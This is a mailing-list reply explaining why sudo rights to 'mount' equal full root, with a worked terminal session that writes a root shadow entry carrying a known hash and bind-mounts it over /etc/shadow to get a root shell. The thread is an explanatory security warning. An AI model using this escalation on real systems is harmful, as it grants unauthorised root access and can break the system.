Hello, On Mon, Jun 24, 2019 at 12:34:36PM +1200, Richard Hector wrote: > On 23/06/19 12:07 PM, Andy Smith wrote: > > andy@debtest1:~$ su - bob > > Password: > > bob@debtest1:~$ whoami > > bob > > bob@debtest1:~$ sudo -i > > [sudo] password for bob: > > Sorry, user bob is not allowed to execute '/bin/bash' as root on > > debtest1.vps.bitfolk.com. > > bob@debtest1:~$ echo > > 'bob:$6$K6b1uzg.$pTNKJG/9hIgnhBL53Y2mr0rrsBBZE1xDWE0bO8E94dBlM.itel4/meJTZYL12IIOZ9ck/ > > 3P2/j5XGbyKcKxFK/:18070:0:99999:7:::' > myshadow > > bob@debtest1:~$ sudo mount --bind ./myshadow /etc/shadow > > bob@debtest1:~$ su - > > Password: > > root@debtest1:~# whoami > > root
[…] > Haven't you just set your own (bob) password there? Not saying you > couldn't set root's instead, but ... it looks like in this case you > already knew it. Yes, it was a mispaste from an earlier line in my screen history. Sorry about that. Point is you can take a hash that you already know, e.g. your own, write it into a new shadow file but make it be for the root user, not your own user, e.g.: bob@debtest1:~$ echo 'root:$6$K6b1uzg.$pTNKJG/9hIgnhBL53Y2mr0rrsBBZE1xDWE0bO8E94dBlM.itel4/meJTZYL12IIOZ9ck/3P2/j5XGbyKcKxFK/:18070:0:99999:7:::' > myshadow and then since you are able to use mount as root you can bind mount your new shadow file over the system's real shadow file, hence effectively resetting root's password: bob@debtest1:~$ sudo mount --bind ./myshadow /etc/shadow bob@debtest1:~$ su - Password: root@debtest1:~# whoami root Since you can bind mount files and directories, root access to "mount" means root access to every part of the existing filesystem so there's many many ways of getting a root shell from that. Try it. :) But maybe on a test host as bind-mounting over something important may completely break your system. Cheers, Andy
